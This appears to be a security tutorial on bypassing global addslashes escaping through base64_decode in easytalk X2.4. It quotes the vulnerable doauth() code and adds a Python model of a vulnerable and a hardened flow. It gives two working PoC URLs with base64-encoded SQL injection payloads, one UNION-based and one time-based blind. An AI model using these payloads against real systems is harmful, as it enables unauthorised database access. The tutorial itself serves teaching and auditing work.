Bypassing global SQL injection protection: the base64_decode case
0x01 Background
Most web applications today have some form of global filtering against SQL injection, such as enabling magic_quotes_gpc in PHP or calling addslashes() on every received parameter from a global include file, which escapes single quotes in particular. In this series we look for encoding and decoding functions that restore the original input after the global filter has already run, so that the escaping is undone. This article covers base64_decode.
0x02 Environment setup
For the target we use an older release of the easytalk program, version X2.4.
I packed a copy of the source code: http://pan.baidu.com/s/1bopOFNL
Decompress the package into the easytalk directory under www and follow the prompts to install it step by step. If you run into problems, search Baidu or Google. Once installation succeeds, visit:
First, let's look at the source code layout. The ThinkPHP framework structure is fairly involved:
If you are interested you can study it further; what matters here is that ThinkPHP filters received parameters, and the handling depends on whether magic_quotes_gpc is enabled on your server:
1. Line 3 of the /ThinkPHP/Extend/Library/ORG/Util/Input.class.php file:
```php
/**
 +----------------------------------------------------------
 * If magic_quotes_gpc is disabled, this function escapes the string
 +----------------------------------------------------------
 * @access public
 +----------------------------------------------------------
 * @param string $string the string to be processed
 +----------------------------------------------------------
 * @return string
 +----------------------------------------------------------
 */
static public function addSlashes($string) {
    if (!get_magic_quotes_gpc()) {
        $string = addslashes($string);
    }
    return $string;
}
```
2. Using the global search of the Seay code audit system for the keyword "base64_decode" shows that SettingAction.class.php calls base64_decode on the received parameter auth:
3. Following this PHP file, we find that although the daddslashes function is applied for injection filtering, the parameter auth is then passed through base64_decode. The filter only ever sees the base64 text, which contains no quotes, so the decoded value reaches the SQL string unescaped and the injection bypasses the filter:
```php
// Authenticate e-mail
public function doauth() {
    $_authmsg = daddslashes($_GET['auth']);  // checks again whether GPC is enabled and applies injection filtering
    $authmsg = base64_decode($_authmsg);     // base64_decode restores the original bytes, undoing the escaping
    $tem = explode(":", $authmsg);           // split the decoded authmsg on ":" into the array $tem
    $send_id = $tem[0];
    $user = M('users');
    // $send_id is interpolated into the where clause without escaping: this is the injection point
    $row = $user->field('mailadres,auth_email')->where("user_id='$send_id'")->find();
    if ($_authmsg == $row['auth_email']) {
        $user->where("user_id='$send_id'")->setField('auth_email', 1);
        setcookie('setok', json_encode(array('lang' => L('mail6'), 'ico' => 1)), 0, '/');
    } else {
        setcookie('setok', json_encode(array('lang' => L('mail7'), 'ico' => 2)), 0, '/');
    }
    header('location:' . SITE_URL . '/?m=setting&a=mailauth');
}
```
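To make the ordering problem concrete, here is an added Python model of the two parameter flows; it is not code from easytalk or ThinkPHP. The original order (escape, then decode) lets the decoded bytes reach the query untouched, while decoding first and validating send_id as an integer before it is used into the query does not. The auth strings are constructed for illustration.

```python
import base64
import re


def addslashes(s: str) -> str:
    """Model of PHP addslashes(): backslash-escape quotes and backslashes."""
    return re.sub(r"(['\"\\])", r"\\\1", s)


def vulnerable_where(auth_param: str) -> str:
    """Mirrors doauth(): daddslashes() runs on the raw parameter, then
    base64_decode() restores the original bytes, so the escaping is lost."""
    escaped = addslashes(auth_param)        # base64 alphabet has no quotes: no-op
    decoded = base64.b64decode(escaped).decode("utf-8", errors="replace")
    send_id = decoded.split(":")[0]         # $tem[0]
    return f"user_id='{send_id}'"           # raw interpolation, as in the original


def hardened_where(auth_param: str) -> str:
    """Decode first, then validate: user_id is numeric, so reject anything else.
    Raises ValueError instead of building a query from untrusted text."""
    try:
        decoded = base64.b64decode(auth_param, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValueError("auth is not valid base64") from exc
    send_id = decoded.split(":")[0]
    if not re.fullmatch(r"[0-9]+", send_id):
        raise ValueError("send_id must be an integer")
    return f"user_id='{int(send_id)}'"


def hardened_rejects(auth_param: str) -> bool:
    """True if hardened_where() refuses the parameter."""
    try:
        hardened_where(auth_param)
    except ValueError:
        return True
    return False


# Constructed inputs: a well-formed token and one carrying a single quote.
GOOD_AUTH = base64.b64encode(b"1:token").decode()
QUOTED_AUTH = base64.b64encode(b"1'#:token").decode()

if __name__ == "__main__":
    print(vulnerable_where(QUOTED_AUTH))   # the quote survives into the SQL string
    print(hardened_rejects(QUOTED_AUTH))   # True: rejected before any query is built
```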
Construct the POC for obtaining database information:
http://localhost/eazytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==
Check whether the SQL statement executed successfully:
We find that this is a blind injection with no output, so we switch to a time-based blind injection statement. PoC to test whether the first character of the current database user name is 'r' (ASCII value 114):
http://localhost/eazytalk/?m=index&a=mailactivity&auth=MicgYW5kIChzZWxlY3QgaWYoKGFzY2lpKHN1YnN0cmluZygoc2VsZWN0IHVzZXIoKSksMSwxKSkgPSAxMTQpLHNsZWVwKDUpLDApKSM=
The page hangs for 5 seconds, which shows that the first character of user() is 'r'. Verify that the SQL statement executed:
Finally, if you are interested, you can write a Python script to automate this blind injection.